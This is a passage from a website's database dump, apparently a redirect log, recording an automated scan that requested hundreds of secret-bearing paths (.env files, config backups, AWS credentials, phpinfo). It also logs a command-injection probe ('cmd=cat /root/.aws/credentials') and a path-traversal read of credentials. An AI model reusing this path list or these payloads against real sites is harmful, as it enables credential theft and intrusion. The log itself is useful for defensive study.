00:00:00',301),(61407,'https://www.3s-technologies.com.tr/en/.env.docker.dev',NULL,'','',1,0,'2026-04-12 10:35:15','0000-00-00 00:00:00',301),(61408,'https://www.3s-technologies.com.tr/en/.env.test',NULL,'','',1,0,'2026-04-12 10:35:15','0000-00-00 00:00:00',301),(61409,'https://www.3s-technologies.com.tr/en/env',NULL,'','',1,0,'2026-04-12 10:35:16','0000-00-00 00:00:00',301),(61410,'https://www.3s-technologies.com.tr/en/env.list',NULL,'','',1,0,'2026-04-12 10:35:16','0000-00-00 00:00:00',301),(61411,'https://www.3s-technologies.com.tr/en/.ghc.environment',NULL,'','',1,0,'2026-04-12 10:35:17','0000-00-00 00:00:00',301),(61412,'https://www.3s-technologies.com.tr/en/env.txt',NULL,'','',1,0,'2026-04-12 10:35:17','0000-00-00 00:00:00',301),(61413,'https://www.3s-technologies.com.tr/en/printenv',NULL,'','',1,0,'2026-04-12 10:35:17','0000-00-00 00:00:00',301),(61414,'https://www.3s-technologies.com.tr/en/.hsenv',NULL,'','',1,0,'2026-04-12 10:35:18','0000-00-00 00:00:00',301),(61415,'https://www.3s-technologies.com.tr/en/environment',NULL,'','',1,0,'2026-04-12 10:35:18','0000-00-00 00:00:00',301),(61416,'https://www.3s-technologies.com.tr/en/env.json',NULL,'','',1,0,'2026-04-12 10:35:19','0000-00-00 00:00:00',301),(61417,'https://www.3s-technologies.com.tr/en/envrc',NULL,'','',1,0,'2026-04-12 10:35:19','0000-00-00 00:00:00',301),(61418,'https://www.3s-technologies.com.tr/en/.env.dev.local',NULL,'','',1,0,'2026-04-12 10:35:19','0000-00-00 00:00:00',301),(61419,'https://www.3s-technologies.com.tr/en/environment.ts',NULL,'','',1,0,'2026-04-12 10:35:20','0000-00-00 00:00:00',301),(61420,'https://www.3s-technologies.com.tr/en/.env_old',NULL,'','',1,0,'2026-04-12 10:35:20','0000-00-00 00:00:00',301),(61421,'https://www.3s-technologies.com.tr/en/.zshenv',NULL,'','',1,0,'2026-04-12 10:35:21','0000-00-00 00:00:00',301),(61422,'https://www.3s-technologies.com.tr/en/.env.development.sample',NULL,'','',1,0,'2026-04-12 10:35:21','0000-00-00 00:00:00',301),(61423,'https://www.3s-technologies.com.tr/en/.rbenv-version',NULL,'','',1,0,'2026-04-12 10:35:22','0000-00-00 00:00:00',301),(61424,'https://www.3s-technologies.com.tr/en/.env-sample',NULL,'','',1,0,'2026-04-12 10:35:22','0000-00-00 00:00:00',301),(61425,'https://www.3s-technologies.com.tr/en/.env.prod.local',NULL,'','',1,0,'2026-04-12 10:35:23','0000-00-00 00:00:00',301),(61426,'https://www.3s-technologies.com.tr/en/.env.travis',NULL,'','',1,0,'2026-04-12 10:35:24','0000-00-00 00:00:00',301),(61427,'https://www.3s-technologies.com.tr/en/.env.test.sample',NULL,'','',1,0,'2026-04-12 10:35:24','0000-00-00 00:00:00',301),(61428,'https://www.3s-technologies.com.tr/en/.env.2',NULL,'','',1,0,'2026-04-12 10:35:25','0000-00-00 00:00:00',301),(61429,'https://www.3s-technologies.com.tr/en/.vscode/.env',NULL,'','',1,0,'2026-04-12 10:35:25','0000-00-00 00:00:00',301),(61430,'https://www.3s-technologies.com.tr/en/.env.local',NULL,'','',1,0,'2026-04-12 10:35:26','0000-00-00 00:00:00',301),(61431,'https://www.3s-technologies.com.tr/en/.env.txt',NULL,'','',1,0,'2026-04-12 10:35:26','0000-00-00 00:00:00',301),(61432,'https://www.3s-technologies.com.tr/en/.env.save',NULL,'','',1,0,'2026-04-12 10:35:26','0000-00-00 00:00:00',301),(61433,'https://www.3s-technologies.com.tr/en/printenv.tmp',NULL,'','',1,0,'2026-04-12 10:35:27','0000-00-00 00:00:00',301),(61434,'https://www.3s-technologies.com.tr/en/.flaskenv',NULL,'','',1,0,'2026-04-12 10:35:27','0000-00-00 00:00:00',301),(61435,'https://www.3s-technologies.com.tr/en/.env.test.local',NULL,'','',1,0,'2026-04-12 10:35:28','0000-00-00 00:00:00',301),(61436,'https://www.3s-technologies.com.tr/en/.jenv-version',NULL,'','',1,0,'2026-04-12 10:35:28','0000-00-00 00:00:00',301),(61437,'https://www.3s-technologies.com.tr/en/.envrc',NULL,'','',1,0,'2026-04-12 10:35:29','0000-00-00 00:00:00',301),(61438,'https://www.3s-technologies.com.tr/en/.env.dist',NULL,'','',1,0,'2026-04-12 10:35:29','0000-00-00 00:00:00',301),(61439,'https://www.3s-technologies.com.tr/en/.env.sample.php',NULL,'','',1,0,'2026-04-12 10:35:30','0000-00-00 00:00:00',301),(61440,'https://www.3s-technologies.com.tr/en/.env1',NULL,'','',1,0,'2026-04-12 10:35:30','0000-00-00 00:00:00',301),(61441,'https://www.3s-technologies.com.tr/en/.venv',NULL,'','',1,0,'2026-04-12 10:35:31','0000-00-00 00:00:00',301),(61442,'https://www.3s-technologies.com.tr/en/env.prod.js',NULL,'','',1,0,'2026-04-12 10:35:31','0000-00-00 00:00:00',301),(61443,'https://www.3s-technologies.com.tr/en/env.test.js',NULL,'','',1,0,'2026-04-12 10:35:32','0000-00-00 00:00:00',301),(61444,'https://www.3s-technologies.com.tr/en/env.bak',NULL,'','',1,0,'2026-04-12 10:35:32','0000-00-00 00:00:00',301),(61445,'https://www.3s-technologies.com.tr/en/env.php',NULL,'','',1,0,'2026-04-12 10:35:32','0000-00-00 00:00:00',301),(61446,'https://www.3s-technologies.com.tr/en/admin/config?cmd=cat /root/.aws/credentials',NULL,'','',1,0,'2026-04-12 10:35:33','0000-00-00 00:00:00',301),(61447,'https://www.3s-technologies.com.tr/en/pms?module=logging&file_name=../../../../../../~/.aws/credentials&number_of_lines=10000',NULL,'','',1,0,'2026-04-12 10:35:33','0000-00-00 00:00:00',301),(61448,'https://www.3s-technologies.com.tr/en/k8s/.env',NULL,'','',1,0,'2026-04-12 10:35:34','0000-00-00 00:00:00',301),(61449,'https://www.3s-technologies.com.tr/en/config/.env',NULL,'','',1,0,'2026-04-12 10:35:34','0000-00-00 00:00:00',301),(61450,'https://www.3s-technologies.com.tr/en/app/.env',NULL,'','',1,0,'2026-04-12 10:35:34','0000-00-00 00:00:00',301),(61451,'https://www.3s-technologies.com.tr/en/api/.env',NULL,'','',1,0,'2026-04-12 10:35:35','0000-00-00 00:00:00',301),(61452,'https://www.3s-technologies.com.tr/en/backend/.env',NULL,'','',1,0,'2026-04-12 10:35:35','0000-00-00 00:00:00',301),(61453,'https://www.3s-technologies.com.tr/en/src/.env',NULL,'','',1,0,'2026-04-12 10:35:36','0000-00-00 00:00:00',301),(61454,'https://www.3s-technologies.com.tr/en/web/.env',NULL,'','',1,0,'2026-04-12 10:35:37','0000-00-00 00:00:00',301),(61455,'https://www.3s-technologies.com.tr/en/server/.env',NULL,'','',1,0,'2026-04-12 10:35:37','0000-00-00 00:00:00',301),(61456,'https://www.3s-technologies.com.tr/en/client/.env',NULL,'','',1,0,'2026-04-12 10:35:38','0000-00-00 00:00:00',301),(61457,'https://www.3s-technologies.com.tr/en/frontend/.env',NULL,'','',1,0,'2026-04-12 10:35:38','0000-00-00 00:00:00',301),(61458,'https://www.3s-technologies.com.tr/en/.env.development',NULL,'','',1,0,'2026-04-12 10:35:39','0000-00-00 00:00:00',301),(61459,'https://www.3s-technologies.com.tr/en/.env.staging',NULL,'','',1,0,'2026-04-12 10:35:39','0000-00-00 00:00:00',301),(61460,'https://www.3s-technologies.com.tr/en/.env.live',NULL,'','',1,0,'2026-04-12 10:35:39','0000-00-00 00:00:00',301),(61461,'https://www.3s-technologies.com.tr/en/config.json',NULL,'','',1,0,'2026-04-12 10:35:40','0000-00-00 00:00:00',301),(61462,'https://www.3s-technologies.com.tr/en/admin/config.php',NULL,'','',1,0,'2026-04-12 10:35:40','0000-00-00 00:00:00',301),(61463,'https://www.3s-technologies.com.tr/en/api/config.php',NULL,'','',1,0,'2026-04-12 10:35:41','0000-00-00 00:00:00',301),(61464,'https://www.3s-technologies.com.tr/en/config/config.php',NULL,'','',1,0,'2026-04-12 10:35:41','0000-00-00 00:00:00',301),(61465,'https://www.3s-technologies.com.tr/en/app/config.php',NULL,'','',1,0,'2026-04-12 10:35:42','0000-00-00 00:00:00',301),(61466,'https://www.3s-technologies.com.tr/en/backend/config.php',NULL,'','',1,0,'2026-04-12 10:35:42','0000-00-00 00:00:00',301),(61467,'https://www.3s-technologies.com.tr/en/src/config.php',NULL,'','',1,0,'2026-04-12 10:35:43','0000-00-00 00:00:00',301),(61468,'https://www.3s-technologies.com.tr/en/config/database.php',NULL,'','',1,0,'2026-04-12 10:35:43','0000-00-00 00:00:00',301),(61469,'https://www.3s-technologies.com.tr/en/config/mail.php',NULL,'','',1,0,'2026-04-12 10:35:44','0000-00-00 00:00:00',301),(61470,'https://www.3s-technologies.com.tr/en/config/app.php',NULL,'','',1,0,'2026-04-12 10:35:44','0000-00-00 00:00:00',301),(61471,'https://www.3s-technologies.com.tr/en/config/services.php',NULL,'','',1,0,'2026-04-12 10:35:44','0000-00-00 00:00:00',301),(61472,'https://www.3s-technologies.com.tr/en/wp-config.php',NULL,'','',1,0,'2026-04-12 10:35:45','0000-00-00 00:00:00',301),(61473,'https://www.3s-technologies.com.tr/en/.aws/config',NULL,'','',1,0,'2026-04-12 10:35:45','0000-00-00 00:00:00',301),(61474,'https://www.3s-technologies.com.tr/en/config/aws.json',NULL,'','',1,0,'2026-04-12 10:35:46','0000-00-00 00:00:00',301),(61475,'https://www.3s-technologies.com.tr/en/config/sendgrid.json',NULL,'','',1,0,'2026-04-12 10:35:46','0000-00-00 00:00:00',301),(61476,'https://www.3s-technologies.com.tr/en/config/mailgun.json',NULL,'','',1,0,'2026-04-12 10:35:47','0000-00-00 00:00:00',301),(61477,'https://www.3s-technologies.com.tr/en/sendgrid.json',NULL,'','',1,0,'2026-04-12 10:35:47','0000-00-00 00:00:00',301),(61478,'https://www.3s-technologies.com.tr/en/aws.json',NULL,'','',1,0,'2026-04-12 10:35:47','0000-00-00 00:00:00',301),(61479,'https://www.3s-technologies.com.tr/en/api_keys.json',NULL,'','',1,0,'2026-04-12 10:35:48','0000-00-00 00:00:00',301),(61480,'https://www.3s-technologies.com.tr/en/keys.json',NULL,'','',1,0,'2026-04-12 10:35:48','0000-00-00 00:00:00',301),(61481,'https://www.3s-technologies.com.tr/en/secrets.json',NULL,'','',1,0,'2026-04-12 10:35:49','0000-00-00 00:00:00',301),(61482,'https://www.3s-technologies.com.tr/en/config/secrets.json',NULL,'','',1,0,'2026-04-12 10:35:49','0000-00-00 00:00:00',301),(61483,'https://www.3s-technologies.com.tr/en/private/.env',NULL,'','',1,0,'2026-04-12 10:35:50','0000-00-00 00:00:00',301),(61484,'https://www.3s-technologies.com.tr/en/backup/.env',NULL,'','',1,0,'2026-04-12 10:35:50','0000-00-00 00:00:00',301),(61485,'https://www.3s-technologies.com.tr/en/test/.env',NULL,'','',1,0,'2026-04-12 10:35:50','0000-00-00 00:00:00',301),(61486,'https://www.3s-technologies.com.tr/en/dev/.env',NULL,'','',1,0,'2026-04-12 10:35:51','0000-00-00 00:00:00',301),(61487,'https://www.3s-technologies.com.tr/en/staging/.env',NULL,'','',1,0,'2026-04-12 10:35:51','0000-00-00 00:00:00',301),(61488,'https://www.3s-technologies.com.tr/en/production/.env',NULL,'','',1,0,'2026-04-12 10:35:52','0000-00-00 00:00:00',301),(61489,'https://www.3s-technologies.com.tr/en/config/config.json',NULL,'','',1,0,'2026-04-12 10:35:53','0000-00-00 00:00:00',301),(61490,'https://www.3s-technologies.com.tr/en/app/config.json',NULL,'','',1,0,'2026-04-12 10:35:53','0000-00-00 00:00:00',301),(61491,'https://www.3s-technologies.com.tr/en/test/phpinfo.php',NULL,'','',1,0,'2026-04-12 10:35:54','0000-00-00 00:00:00',301),(61492,'https://www.3s-technologies.com.tr/en/backup/config.php',NULL,'','',1,0,'2026-04-12 10:35:54','0000-00-00 00:00:00',301),(61493,'https://www.3s-technologies.com.tr/en/private/config.php',NULL,'','',1,0,'2026-04-12 10:35:54','0000-00-00 00:00:00',301),(61494,'https://www.3s-technologies.com.tr/en/settings.php',NULL,'','',1,0,'2026-04-12 10:35:55','0000-00-00 00:00:00',301),(61495,'https://www.3s-technologies.com.tr/en/app/settings.php',NULL,'','',1,0,'2026-04-12 10:35:56','0000-00-00 00:00:00',301),(61496,'https://www.3s-technologies.com.tr/en/config/settings.php',NULL,'','',1,0,'2026-04-12 10:35:56','0000-00-00 00:00:00',301),(61497,'https://www.3s-technologies.com.tr/en/database.yml',NULL,'','',1,0,'2026-04-12 10:35:57','0000-00-00 00:00:00',301),(61498,'https://www.3s-technologies.com.tr/en/config/database.json',NULL,'','',1,0,'2026-04-12 10:35:57','0000-00-00 00:00:00',301),(61499,'https://www.3s-technologies.com.tr/en/administrator/.env',NULL,'','',1,0,'2026-04-12 10:35:58','0000-00-00 00:00:00',301),(61500,'https://www.3s-technologies.com.tr/en/cms/.env',NULL,'','',1,0,'2026-04-12 10:35:58','0000-00-00 00:00:00',301),(61501,'https://www.3s-technologies.com.tr/en/portal/.env',NULL,'','',1,0,'2026-04-12 10:35:58','0000-00-00 00:00:00',301),(61502,'https://www.3s-technologies.com.tr/en/dashboard/.env',NULL,'','',1,0,'2026-04-12 10:35:59','0000-00-00 00:00:00',301),(61503,'https://www.3s-technologies.com.tr/en/crm/.env',NULL,'','',1,0,'2026-04-12 10:35:59','0000-00-00 00:00:00',301),(61504,'https://www.3s-technologies.com.tr/en/mail/.env',NULL,'','',1,0,'2026-04-12 10:36:00','0000-00-00 00:00:00',301),(61505,'https://www.3s-technologies.com.tr/en/mailer/.env',NULL,'','',1,0,'2026-04-12 10:36:00','0000-00-00 00:00:00',301),(61506,'https://www.3s-technologies.com.tr/en/deployment/.env',NULL,'','',1,0,'2026-04-12 10:36:01','0000-00-00 00:00:00',301),(61507,'https://www.3s-technologies.com.tr/en/docker/.env',NULL,'','',1,0,'2026-04-12 10:36:01','0000-00-00 00:00:00',301),(61508,'https://www.3s-technologies.com.tr/en/helm/.env',NULL,'','',1,0,'2026-04-12 10:36:02','0000-00-00 00:00:00',301),(61509,'https://www.3s-technologies.com.tr/en/terraform/.env',NULL,'','',1,0,'2026-04-12 10:36:02','0000-00-00 00:00:00',301),(61510,'https://www.3s-technologies.com.tr/en/ansible/.env',NULL,'','',1,0,'2026-04-12 10:36:03','0000-00-00 00:00:00',301),(61511,'https://www.3s-technologies.com.tr/en/config/mail.json',NULL,'','',1,0,'2026-04-12 10:36:03','0000-00-00 00:00:00',301),(61512,'https://www.3s-technologies.com.tr/en/config/smtp.php',NULL,'','',1,0,'2026-04-12 10:36:03','0000-00-00 00:00:00',301),(61513,'https://www.3s-technologies.com.tr/en/config/database.yml',NULL,'','',1,0,'2026-04-12 10:36:04','0000-00-00 00:00:00',301),(61514,'https://www.3s-technologies.com.tr/en/secrets/config.json',NULL,'','',1,0,'2026-04-12 10:36:04','0000-00-00 00:00:00',301),(61515,'https://www.3s-technologies.com.tr/en/private/keys.json',NULL,'','',1,0,'2026-04-12 10:36:05','0000-00-00 00:00:00',301),(61516,'https://www.3s-technologies.com.tr/en/.env_example',NULL,'','',1,0,'2026-04-12 10:36:05','0000-00-00 00:00:00',301),(61517,'https://www.3s-technologies.com.tr/en/core/.env',NULL,'','',1,0,'2026-04-12 10:36:05','0000-00-00 00:00:00',301),(61518,'https://www.3s-technologies.com.tr/en/api',NULL,'','',1,0,'2026-04-12 10:36:06','0000-00-00 00:00:00',301),(61519,'https://www.3s-technologies.com.tr/en/backend',NULL,'','',1,0,'2026-04-12 10:36:07','0000-00-00 00:00:00',301),(61520,'https://www.3s-technologies.com.tr/en/local/.env',NULL,'','',1,0,'2026-04-12 10:36:07','0000-00-00 00:00:00',301),(61521,'https://www.3s-technologies.com.tr/en/application/.env',NULL,'','',1,0,'2026-04-12 10:36:07','0000-00-00 00:00:00',301),(61522,'https://www.3s-technologies.com.tr/en/phpinfo',NULL,'','',1,0,'2026-04-12 10:36:08','0000-00-00 00:00:00',301),(61523,'https://www.3s-technologies.com.tr/en/_profiler/phpinfo',NULL,'','',1,0,'2026-04-12 10:36:08','0000-00-00 00:00:00',301),(61524,'https://www.3s-technologies.com.tr/en/config/settings.ini',NULL,'','',1,0,'2026-04-12 10:36:09','0000-00-00 00:00:00',301),(61525,'https://www.3s-technologies.com.tr/en/env/.env',NULL,'','',1,0,'2026-04-12 10:36:10','0000-00-00 00:00:00',301),(61526,'https://www.3s-technologies.com.tr/en/new/.env',NULL,'','',1,0,'2026-04-12 10:36:10','0000-00-00 00:00:00',301),(61527,'https://www.3s-technologies.com.tr/en/new/.env.local',NULL,'','',1,0,'2026-04-12 10:36:10','0000-00-00 00:00:00',301),(61528,'https://www.3s-technologies.com.tr/en/new/.env.production',NULL,'','',1,0,'2026-04-12 10:36:11','0000-00-00 00:00:00',301),(61529,'https://www.3s-technologies.com.tr/en/new/.env.staging',NULL,'','',1,0,'2026-04-12 10:36:12','0000-00-00 00:00:00',301),(61530,'https://www.3s-technologies.com.tr/en/_phpinfo.php',NULL,'','',1,0,'2026-04-12 10:36:12','0000-00-00 00:00:00',301),(61531,'https://www.3s-technologies.com.tr/en/_profiler/phpinfo/info.php',NULL,'','',1,0,'2026-04-12 10:36:13','0000-00-00 00:00:00',301),(61532,'https://www.3s-technologies.com.tr/en/_profiler/phpinfo/phpinfo.php',NULL,'','',1,0,'2026-04-12 10:36:13','0000-00-00 00:00:00',301),(61533,'https://www.3s-technologies.com.tr/en/wp-config',NULL,'','',1,0,'2026-04-12 10:36:13','0000-00-00 00:00:00',301),(61534,'https://www.3s-technologies.com.tr/en/aws-secret.yaml',NULL,'','',1,0,'2026-04-12 10:36:14','0000-00-00 00:00:00',301),(61535,'https://www.3s-technologies.com.tr/en/awstats/.env',NULL,'','',1,0,'2026-04-12 10:36:15','0000-00-00 00:00:00',301),(61536,'https://www.3s-technologies.com.tr/en/conf/.env',NULL,'','',1,0,'2026-04-12 10:36:15','0000-00-00 00:00:00',301),(61537,'https://www.3s-technologies.com.tr/en/cron/.env',NULL,'','',1,0,'2026-04-12 10:36:16','0000-00-00 00:00:00',301),(61538,'https://www.3s-technologies.com.tr/en/www/.env',NULL,'','',1,0,'2026-04-12 10:36:16','0000-00-00 00:00:00',301),(61539,'https://www.3s-technologies.com.tr/en/docker/app/.env',NULL,'','',1,0,'2026-04-12 10:36:17','0000-00-00 00:00:00',301),(61540,'https://www.3s-technologies.com.tr/en/env.backup',NULL,'','',1,0,'2026-04-12 10:36:17','0000-00-00 00:00:00',301),(61541,'https://www.3s-technologies.com.tr/en/xampp/phpinfo.php',NULL,'','',1,0,'2026-04-12 10:36:17','0000-00-00 00:00:00',301),(61542,'https://www.3s-technologies.com.tr/en/lara/info.php',NULL,'','',1,0,'2026-04-12 10:36:18','0000-00-00 00:00:00',301),(61543,'https://www.3s-technologies.com.tr/en/lara/phpinfo.php',NULL,'','',1,0,'2026-04-12 10:36:18','0000-00-00 00:00:00',301),(61544,'https://www.3s-technologies.com.tr/en/laravel/info.php',NULL,'','',1,0,'2026-04-12 10:36:19','0000-00-00 00:00:00',301),(61545,'https://www.3s-technologies.com.tr/en/js/.env',NULL,'','',1,0,'2026-04-12 10:36:19','0000-00-00 00:00:00',301),(61546,'https://www.3s-technologies.com.tr/en/nginx/.env',NULL,'','',1,0,'2026-04-12 10:36:20','0000-00-00 00:00:00',301),(61547,'https://www.3s-technologies.com.tr/en/site/.env',NULL,'','',1,0,'2026-04-12 10:36:21','0000-00-00 00:00:00',301),(61548,'https://www.3s-technologies.com.tr/en/xampp/.env',NULL,'','',1,0,'2026-04-12 10:36:21','0000-00-00 00:00:00',301),(61549,'https://www.3s-technologies.com.tr/en/.docker/laravel/app/.env',NULL,'','',1,0,'2026-04-12 10:36:21','0000-00-00 00:00:00',301),(61550,'https://www.3s-technologies.com.tr/en/laravel/.env.local',NULL,'','',1,0,'2026-04-12 10:36:22','0000-00-00 00:00:00',301),(61551,'https://www.3s-technologies.com.tr/en/laravel/.env.production',NULL,'','',1,0,'2026-04-12 10:36:23','0000-00-00 00:00:00',301),(61552,'https://www.3s-technologies.com.tr/en/laravel/.env.staging',NULL,'','',1,0,'2026-04-12 10:36:23','0000-00-00 00:00:00',301),(61553,'https://www.3s-technologies.com.tr/en/laravel/core/.env.local',NULL,'','',1,0,'2026-04-12 10:36:24','0000-00-00 00:00:00',301),(61554,'https://www.3s-technologies.com.tr/en/laravel/core/.env.production',NULL,'','',1,0,'2026-04-12 10:36:24','0000-00-00 00:00:00',301),(61555,'https://www.3s-technologies.com.tr/en/laravel/core/.env.staging',NULL,'','',1,0,'2026-04-12 10:36:25','0000-00-00 00:00:00',301),(61556,'https://www.3s-technologies.com.tr/en/main/.env',NULL,'','',1,0,'2026-04-12 10:36:25','0000-00-00 00:00:00',301),(61557,'https://www.3s-technologies.com.tr/en/bootstrap/cache/config.php',NULL,'','',1,0,'2026-04-12 10:36:26','0000-00-00 00:00:00',301),(61558,'https://www.3s-technologies.com.tr/en/storage/app/private/.env',NULL,'','',1,0,'2026-04-12 10:36:26','0000-00-00 00:00:00',301),(61559,'https://www.3s-technologies.com.tr/en/storage/logs/laravel.log',NULL,'','',1,0,'2026-04-12 10:36:26','0000-00-00 00:00:00',301),(61560,'https://www.3s-technologies.com.tr/en/composer.lock',NULL,'','',1,0,'2026-04-12 10:36:27','0000-00-00 00:00:00',301),(61561,'https://www.3s-technologies.com.tr/en/server.key',NULL,'','',1,0,'2026-04-12 10:36:27','0000-00-00 00:00:00',301),(61562,'https://www.3s-technologies.com.tr/en/dump.sh',NULL,'','',1,0,'2026-04-12 10:36:28','0000-00-00 00:00:00',301),(61563,'https://www.3s-technologies.com.tr/en/config.php.bak',NULL,'','',1,0,'2026-04-12 10:36:29','0000-00-00 00:00:00',301),(61564,'https://www.3s-technologies.com.tr/en/src/app.js',NULL,'','',1,0,'2026-04-12 10:36:29','0000-00-00 00:00:00',301),(61565,'https://www.3s-technologies.com.tr/en/server-info',NULL,'','',1,0,'2026-04-12 10:36:30','0000-00-00 00:00:00',301),(61566,'https://www.3s-technologies.com.tr/en/docker.sh',NULL,'','',1,0,'2026-04-12 10:36:30','0000-00-00 00:00:00',301),(61567,'https://www.3s-technologies.com.tr/en/config.php.save',NULL,'','',1,0,'2026-04-12 10:36:31','0000-00-00 00:00:00',301),(61568,'https://www.3s-technologies.com.tr/en/pi.php',NULL,'','',1,0,'2026-04-12 10:36:31','0000-00-00 00:00:00',301),(61569,'https://www.3s-technologies.com.tr/en/wp-config.php.bak',NULL,'','',1,0,'2026-04-12 10:36:32','0000-00-00 00:00:00',301),(61570,'https://www.3s-technologies.com.tr/en/wp-config.php.backup',NULL,'','',1,0,'2026-04-12 10:36:33','0000-00-00 00:00:00',301),(61571,'https://www.3s-technologies.com.tr/en/aws-credentials.txt',NULL,'','',1,0,'2026-04-12 10:36:33','0000-00-00 00:00:00',301),(61572,'https://www.3s-technologies.com.tr/en/api/info',NULL,'','',1,0,'2026-04-12 10:36:34','0000-00-00 00:00:00',301),(61573,'https://www.3s-technologies.com.tr/en/config.ini',NULL,'','',1,0,'2026-04-12 10:36:34','0000-00-00 00:00:00',301),(61574,'https://www.3s-technologies.com.tr/en/.aws/credentials.bak',NULL,'','',1,0,'2026-04-12 10:36:35','0000-00-00 00:00:00',301),(61575,'https://www.3s-technologies.com.tr/en/.aws/credentials/admin/.env',NULL,'','',1,0,'2026-04-12 10:36:36','0000-00-00 00:00:00',301),(61576,'https://www.3s-technologies.com.tr/en/.azure-pipelines.yml',NULL,'','',1,0,'2026-04-12 10:36:36','0000-00-00 00:00:00',301),(61577,'https://www.3s-technologies.com.tr/en/.bak',NULL,'','',1,0,'2026-04-12 10:36:37','0000-00-00 00:00:00',301),(61578,'https://www.3s-technologies.com.tr/en/.bitbucket-pipelines.yml',NULL,'','',1,0,'2026-04-12 10:36:37','0000-00-00 00:00:00',301),(61579,'https://www.3s-technologies.com.tr/en/.bitbucket/.env',NULL,'','',1,0,'2026-04-12 10:36:38','0000-00-00 00:00:00',301),(61580,'https://www.3s-technologies.com.tr/en/.boto',NULL,'','',1,0,'2026-04-12 10:36:38','0000-00-00 00:00:00',301),(61581,'https://www.3s-technologies.com.tr/en/.bzr',NULL,'','',1,0,'2026-04-12 10:36:39','0000-00-00 00:00:00',301),(61582,'https://www.3s-technologies.com.tr/en/.c9/metadata/environment/.env',NULL,'','',1,0,'2026-04-12 10:36:39','0000-00-00 00:00:00',301),(61583,'https://www.3s-technologies.com.tr/en/.circleci/.env',NULL,'','',1,0,'2026-04-12 10:36:40','0000-00-00 00:00:00',301),(61584,'https://www.3s-technologies.com.tr/en/.circleci/config.yml',NULL,'','',1,0,'2026-04-12 10:36:40','0000-00-00 00:00:00',301),(61585,'https://www.3s-technologies.com.tr/en/.dockerignore',NULL,'','',1,0,'2026-04-12 10:36:41','0000-00-00 00:00:00',301),(61586,'https://www.3s-technologies.com.tr/en/.env-db',NULL,'','',1,0,'2026-04-12 10:36:41','0000-00-00 00:00:00',301),(61587,'https://www.3s-technologies.com.tr/en/.env.back',NULL,'','',1,0,'2026-04-12 10:36:42','0000-00-00 00:00:00',301),(61588,'https://www.3s-technologies.com.tr/en/.env.bkp',NULL,'','',1,0,'2026-04-12 10:36:42','0000-00-00 00:00:00',301),(61589,'https://www.3s-technologies.com.tr/en/.env.credentials',NULL,'','',1,0,'2026-04-12 10:36:43','0000-00-00 00:00:00',301),(61590,'https://www.3s-technologies.com.tr/en/.env.email',NULL,'','',1,0,'2026-04-12 10:36:43','0000-00-00 00:00:00',301),(61591,'https://www.3s-technologies.com.tr/en/.env.hidden',NULL,'','',1,0,'2026-04-12 10:36:44','0000-00-00 00:00:00',301),(61592,'https://www.3s-technologies.com.tr/en/.env.hide',NULL,'','',1,0,'2026-04-12 10:36:44','0000-00-00 00:00:00',301),(61593,'https://www.3s-technologies.com.tr/en/.env.js',NULL,'','',1,0,'2026-04-12 10:36:45','0000-00-00 00:00:00',301),(61594,'https://www.3s-technologies.com.tr/en/.env.key',NULL,'','',1,0,'2026-04-12 10:36:45','0000-00-00 00:00:00',301),(61595,'https://www.3s-technologies.com.tr/en/.env.mail',NULL,'','',1,0,'2026-04-12 10:36:46','0000-00-00 00:00:00',301),(61596,'https://www.3s-technologies.com.tr/en/.env.smtp',NULL,'','',1,0,'2026-04-12 10:36:46','0000-00-00 00:00:00',301),(61597,'https://www.3s-technologies.com.tr/en/.env.swp',NULL,'','',1,0,'2026-04-12 10:36:47','0000-00-00 00:00:00',301),(61598,'https://www.3s-technologies.com.tr/en/.env.testing',NULL,'','',1,0,'2026-04-12 10:36:47','0000-00-00 00:00:00',301),(61599,'https://www.3s-technologies.com.tr/en/.env.uat',NULL,'','',1,0,'2026-04-12 10:36:48','0000-00-00 00:00:00',301),(61600,'https://www.3s-technologies.com.tr/en/.env_aws',NULL,'','',1,0,'2026-04-12 10:36:48','0000-00-00 00:00:00',301),(61601,'https://www.3s-technologies.com.tr/en/.env_backup',NULL,'','',1,0,'2026-04-12 10:36:48','0000-00-00 00:00:00',301),(61602,'https://www.3s-technologies.com.tr/en/.env_copy',NULL,'','',1,0,'2026-04-12 10:36:49','0000-00-00 00:00:00',301),(61603,'https://www.3s-technologies.com.tr/en/.env_private',NULL,'','',1,0,'2026-04-12 10:36:49','0000-00-00 00:00:00',301),(61604,'https://www.3s-technologies.com.tr/en/.env_secret',NULL,'','',1,0,'2026-04-12 10:36:50','0000-00-00 00:00:00',301),(61605,'https://www.3s-technologies.com.tr/en/.env~',NULL,'','',1,0,'2026-04-12 10:36:50','0000-00-00 00:00:00',301),(61606,'https://www.3s-technologies.com.tr/en/.github/.env',NULL,'','',1,0,'2026-04-12 10:36:51','0000-00-00 00:00:00',301),(61607,'https://www.3s-technologies.com.tr/en/.github/workflows/*.yml',NULL,'','',1,0,'2026-04-12 10:36:51','0000-00-00 00:00:00',301),(61608,'https://www.3s-technologies.com.tr/en/.gitignore',NULL,'','',1,0,'2026-04-12 10:36:52','0000-00-00 00:00:00',301),(61609,'https://www.3s-technologies.com.tr/en/.gitlab-ci.yml',NULL,'','',1,0,'2026-04-12 10:36:52','0000-00-00 00:00:00',301),(61610,'https://www.3s-technologies.com.tr/en/.gitlab-ci/.env',NULL,'','',1,0,'2026-04-12 10:36:53','0000-00-00 00:00:00',301),(61611,'https://www.3s-technologies.com.tr/en/.gitlab/.env',NULL,'','',1,0,'2026-04-12 10:36:53','0000-00-00 00:00:00',301),(61612,'https://www.3s-technologies.com.tr/en/.idea/.env',NULL,'','',1,0,'2026-04-12 10:36:54','0000-00-00 00:00:00',301),(61613,'https://www.3s-technologies.com.tr/en/.local',NULL,'','',1,0,'2026-04-12 10:36:54','0000-00-00 00:00:00',301),(61614,'https://www.3s-technologies.com.tr/en/.next',NULL,'','',1,0,'2026-04-12 10:36:55','0000-00-00 00:00:00',301),(61615,'https://www.3s-technologies.com.tr/en/.npmrc',NULL,'','',1,0,'2026-04-12 10:36:55','0000-00-00 00:00:00',301),(61616,'https://www.3s-technologies.com.tr/en/.nuxt',NULL,'','',1,0,'2026-04-12 10:36:56','0000-00-00 00:00:00',301),(61617,'https://www.3s-technologies.com.tr/en/.output',NULL,'','',1,0,'2026-04-12 10:36:56','0000-00-00 00:00:00',301),(61618,'https://www.3s-technologies.com.tr/en/.phpinfo',NULL,'','',1,0,'2026-04-12 10:36:57','0000-00-00 00:00:00',301),(61619,'https://www.3s-technologies.com.tr/en/.production',NULL,'','',1,0,'2026-04-12 10:36:57','0000-00-00 00:00:00',301),(61620,'https://www.3s-technologies.com.tr/en/.pypirc',NULL,'','',1,0,'2026-04-12 10:36:58','0000-00-00 